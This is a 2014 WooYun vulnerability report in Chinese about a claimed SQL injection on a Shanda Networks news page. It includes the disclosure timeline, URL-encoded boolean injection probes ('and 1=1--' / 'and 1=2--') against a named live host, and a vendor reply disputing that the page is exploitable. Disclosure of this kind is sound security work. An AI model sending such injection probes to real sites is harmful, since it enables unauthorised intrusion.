[公开漏洞]盛大网络某分站SQL注射

盛大网络某分站SQL注射 相关厂商： 盛大网络 漏洞作者：kobin97 提交时间：2014-04-13 23:06 公开时间：2014-05-28 23:07 漏洞类型：SQL注射漏洞 危害等级：中 自评Rank：10 漏洞状态： 厂商已经确认 漏洞来源：http://www.wooyun.org Tags标签： 注射技巧 漏洞详情 披露状态：

2014-04-13：细节已通知厂商并且等待厂商处理中
2014-04-14：厂商已经确认，细节仅向厂商公开
2014-04-24：细节向核心白帽子及相关领域专家公开
2014-05-04：细节向普通白帽子公开
2014-05-14：细节向实习白帽子公开
2014-05-28：细节向公众公开

简要描述：

盛大网络某分站SQL注射

详细说明：

错误：

http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21x&page=1



正常注入

http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=1--&page=1

错误注入

http://xgui.sdo.com/news/ListNews.aspx?channel=18,19,21%29%20and%201=2--&page=1

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 kobin97@乌云 漏洞回应 厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-04-14 09:24

厂商回复：

感谢对盛大网络安全的关注，正在联系相关人员处理中。

最新状态：

2014-04-14：这个严格意义上说不能注入，最后一句int.parse()。